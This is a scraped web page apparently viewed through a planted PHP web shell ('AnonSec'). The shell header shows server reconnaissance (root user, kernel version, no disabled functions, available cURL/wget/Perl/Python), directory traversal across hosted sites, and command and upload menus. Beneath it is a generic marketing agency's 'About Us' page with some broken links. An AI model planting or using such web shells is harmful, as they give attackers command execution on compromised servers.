|
Server IP : 149.13.87.7 / Your IP : 185.174.145.2 Web Server : nginx System : Linux h2 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : root ( 0) PHP Version : 8.0.28 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /mnt/platforms/workspaces/balaiodegatos.com/../krevontix.com/../bioparan.com/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>About Us - Bioparan</title>
<script src="https://cdn.tailwindcss.com"></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.css" rel="stylesheet" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800;900&family=Plus+Jakarta+Sans:wght@300;400;500;600;700;800;900&display=swap" rel="stylesheet">
<style>
body {
font-family: 'Inter', sans-serif;
padding-top: 80px;
}
h1, h2, h3, h4, h5, h6 {
font-family: 'Plus Jakarta Sans', sans-serif;
}
@media (max-width: 768px) {
body {
padding-top: 72px;
}
}
</style>
<link rel="stylesheet" href="assets/css/dynamic.css">
</head>
<body class="antialiased">
<nav class="bg-white fixed w-full z-50 top-0 border-b border-gray-100">
<div class="max-w-screen-xl mx-auto px-6 py-2 flex items-center justify-between">
<a href="./" class="flex items-center space-x-3">
<div class="w-12 h-12 rounded-full bg-gray-900 text-white font-black text-2xl flex items-center justify-center">
<i class="fas fa-compass"></i>
</div>
<div>
<div class="text-xs uppercase tracking-[0.4em] text-gray-400">Navigator</div>
<div class="text-2xl font-bold text-gray-900">Bioparan</div>
</div>
</a>
<div class="hidden md:flex items-center space-x-6">
<div class="flex items-center space-x-2">
<span class="w-2 h-2 rounded-full bg-emerald-500 animate-pulse"></span>
<span class="text-sm text-gray-500">Online consultation available</span>
</div>
<a href="./" class="text-gray-700 font-semibold hover:text-emeraldHome</a>
<a href="about-us.php" class="text-gray-700 font-semibold hover:text-emerald-600 transition">About</a>
<a href="blog/" class="text-gray-700 font-semibold hover:text-emeraldBlog</a>
</div>
<div class="hidden md:flex items-center space-x-4">
<a href="contact.php" class="px-5 py-2 rounded-lg border-2 border-gray-900 text-gray-900 font-semibold hover:bg-gray-900 hover:text-white transition">Contact</a>
</div>
<button data-collapse-toggle="navbar-21" type="button" class="md:hidden inline-flex items-center justify-center w-11 h-11 rounded-lg bg-gray-100 text-gray-600">
<svg class="w-6 h-6" fill="none" viewBox="0 0 24 24" stroke="currentColor">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M4 6h16M4 12h16M4 18h16" />
</svg>
</button>
</div>
<div class="hidden bg-white" id="navbar-21">
<div class="px-6 pb-6 space-y-4">
<a href="/Home</a>
<a href="about-us.php" class="block text-gray-700 font-semibold">About</a>
<a href="blog/" class="block text-gray-700 font-semibold">Blog</a>
<a href="contact.php" class="block text-center px-5 py-3 rounded-lg bg-gray-900 text-white font-semibold">Contact</a>
</div>
</div>
</nav>
<section class="bg-white py-20" id="about">
<div class="max-w-screen-2xl mx-auto px-4">
<div class="relative">
<div class="absolute inset-0 bg-gradient-to-r from-emerald-600 to-lime-600 rounded-3xl transform -rotate-1"></div>
<div class="relative bg-white rounded-3xl p-12 lg:p-20">
<div class="grid lg:grid-cols-2 gap-16 items-center">
<div class="order-2 lg:order-1 space-y-8">
<div>
<div class="inline-flex items-center space-x-2 mb-6">
<div class="w-12 h-1 bg-emerald-600"></div>
<span class="text-emerald-600 font-bold uppercase text-sm">Growth Catalysts</span>
</div>
<h2 class="text-5xl font-black text-gray-900 mb-6">
Elevate Your eCommerce Business with Our Comprehensive Solutions </h2>
<p class="text-lg text-gray-600 leading-relaxed">
Our digital marketing agency specializes in helping eCommerce businesses grow their sales and revenue. Our expert solutions are designed to optimize your website, boost your online visibility, and attract more customers. With our proven track record of success, we can help you maximize your eCommerce sales and take your business to the next level. </p>
</div>
<div class="flex flex-wrap gap-4">
<div class="flex items-center space-x-3 bg-emerald-50 px-6 py-3 rounded-full">
<i class="fas fa-check-circle text-emerald-600"></i>
<span class="font-semibold text-gray-900">Certified</span>
</div>
<div class="flex items-center space-x-3 bg-emerald-50 px-6 py-3 rounded-full">
<i class="fas fa-check-circle text-emerald-600"></i>
<span class="font-semibold text-gray-900">Trusted</span>
</div>
<div class="flex items-center space-x-3 bg-emerald-50 px-6 py-3 rounded-full">
<i class="fas fa-check-circle text-emerald-600"></i>
<span class="font-semibold text-gray-900">Reliable</span>
</div>
</div>
<a href="#contact" class="inline-block px-10 py-5 bg-gradient-to-r from-emerald-600 to-lime-600 text-white font-black text-lg rounded-full hover:shadow-2xl transition-all">
Explore More </a>
</div>
<div class="order-1 lg:order-2">
<div class="relative">
<div class="absolute -top-6 -right-6 w-48 h-48 bg-emerald-100 rounded-full"></div>
<div class="absolute -bottom-6 -left-6 w-32 h-32 bg-lime-100 rounded-full"></div>
<img src="https://images.unsplash.com/photo-1560264357-8d9202250f21?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3w4Mjk4NTJ8MHwxfHJhbmRvbXx8fHx8fHx8fDE3NzY3MDE0MjF8&ixlib=rb-4.1.0&q=80&w=1080" alt="About" class="relative rounded-2xl shadow-2xl w-full">
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<section class="bg-gradient-to-br from-emerald-600 to-lime-600 py-32" id="testimonials">
<div class="max-w-screen-xl mx-auto px-4 text-center">
<h2 class="text-5xl font-black text-white mb-16">Client Success Stories</h2>
<div class="bg-white/10 backdrop-blur-md rounded-3xl p-12 lg:p-20 border border-white/20 max-w-4xl mx-auto">
<div class="text-6xl text-white/20 mb-6">"</div>
<p class="text-3xl text-white font-light mb-10 leading-relaxed">
Data-driven decisions became our competitive advantage. They turned complex analytics into actionable insights. </p>
<div class="flex items-center justify-center space-x-6">
<img src="https://randomuser.me/api/portraits/men/70.jpg" alt="Jessica Taylor" class="w-20 h-20 rounded-full border-4 border-white/30 bg-white/10">
<div class="text-left text-white">
<div class="text-xl font-bold">Jessica Taylor</div>
<div class="text-white/80">VP of Strategy, Momentum Corp</div>
</div>
</div>
</div>
</div>
</section>
<section class="bg-white py-16">
<div class="max-w-screen-xl mx-auto px-4">
<div class="grid md:grid-cols-4 gap-6">
<div class="group bg-gradient-to-br from-emerald-50 to-lime-50 rounded-2xl p-8 hover:shadow-xl transition-all text-center">
<div class="w-16 h-16 bg-gradient-to-br from-emerald-600 to-lime-600 rounded-2xl flex items-center justify-center mx-auto mb-4 group-hover:scale-110 transition-transform">
<i class="fas fa-smile text-white text-2xl"></i>
</div>
<div class="text-4xl font-black text-emerald-600 mb-2">500+</div>
<div class="text-gray-700 font-semibold">Happy Clients</div>
</div>
<div class="group bg-gradient-to-br from-emerald-50 to-lime-50 rounded-2xl p-8 hover:shadow-xl transition-all text-center">
<div class="w-16 h-16 bg-gradient-to-br from-emerald-600 to-lime-600 rounded-2xl flex items-center justify-center mx-auto mb-4 group-hover:scale-110 transition-transform">
<i class="fas fa-heart text-white text-2xl"></i>
</div>
<div class="text-4xl font-black text-emerald-600 mb-2">98%</div>
<div class="text-gray-700 font-semibold">Satisfaction</div>
</div>
<div class="group bg-gradient-to-br from-emerald-50 to-lime-50 rounded-2xl p-8 hover:shadow-xl transition-all text-center">
<div class="w-16 h-16 bg-gradient-to-br from-emerald-600 to-lime-600 rounded-2xl flex items-center justify-center mx-auto mb-4 group-hover:scale-110 transition-transform">
<i class="fas fa-headset text-white text-2xl"></i>
</div>
<div class="text-4xl font-black text-emerald-600 mb-2">24/7</div>
<div class="text-gray-700 font-semibold">Support</div>
</div>
<div class="group bg-gradient-to-br from-emerald-50 to-lime-50 rounded-2xl p-8 hover:shadow-xl transition-all text-center">
<div class="w-16 h-16 bg-gradient-to-br from-emerald-600 to-lime-600 rounded-2xl flex items-center justify-center mx-auto mb-4 group-hover:scale-110 transition-transform">
<i class="fas fa-award text-white text-2xl"></i>
</div>
<div class="text-4xl font-black text-emerald-600 mb-2">15+</div>
<div class="text-gray-700 font-semibold">Years</div>
</div>
</div>
</div>
</section>
<footer class="bg-gray-900 text-white py-16">
<div class="max-w-screen-xl mx-auto px-4">
<div class="grid md:grid-cols-4 gap-12 mb-12">
<div>
<a href="./" class="flex items-center space-x-3 mb-6">
<div class="w-12 h-12 bg-gradient-to-br from-emerald-500 to-lime-600 rounded-xl flex items-center justify-center">
<span class="text-white font-bold text-xl">B</span>
</div>
<span class="text-2xl font-bold">Bioparan</span>
</a>
<p class="text-gray-400 text-sm mb-6">Your trusted partner for success.</p>
<div class="flex space-x-3">
<a href="#" class="w-10 h-10 bg-gray-800 hover:bg-emerald-600 rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-facebook-f text-sm"></i>
</a>
<a href="#" class="w-10 h-10 bg-gray-800 hover:bg-emerald-600 rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-twitter text-sm"></i>
</a>
<a href="#" class="w-10 h-10 bg-gray-800 hover:bg-emerald-600 rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-linkedin-in text-sm"></i>
</a>
<a href="#" class="w-10 h-10 bg-gray-800 hover:bg-emerald-600 rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-instagram text-sm"></i>
</a>
</div>
</div>
<div>
<h3 class="text-lg font-bold mb-6">Company</h3>
<ul class="space-y-3 text-gray-400 text-sm">
<li><a href="./" class="hover:text-emeraldHome</a></li>
<li><a href="about-us.php" class="hover:text-emerald-400 transition-colors">About</a></li>
<li><a href="contact.php" class="hover:text-emerald-400 transition-colors">Contact</a></li>
</ul>
</div>
<div>
<h3 class="text-lg font-bold mb-6">Resources</h3>
<ul class="space-y-3 text-gray-400 text-sm">
<li><a href="blog/" class="hover:text-emerald-400 transition-colors">Blog</a></li>
</ul>
</div>
<div>
<h3 class="text-lg font-bold mb-6">Legal</h3>
<ul class="space-y-3 text-gray-400 text-sm">
<li><a href="privacy.php" class="hover:text-emerald-400 transition-colors">Privacy</a></li>
<li><a href="terms.php" class="hover:text-emerald-400 transition-colors">Terms</a></li>
<li><a href="disclaimer.php" class="hover:text-emerald-400 transition-colors">Disclaimer</a></li>
</ul>
</div>
</div>
<div class="border-t border-gray-800 pt-8">
<p class="text-gray-500 text-sm text-center">© 2026 Bioparan. All rights reserved.</p>
</div>
</div>
</footer>
<script src="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.js"></script>
</body>
</html>
AnonSec - 2021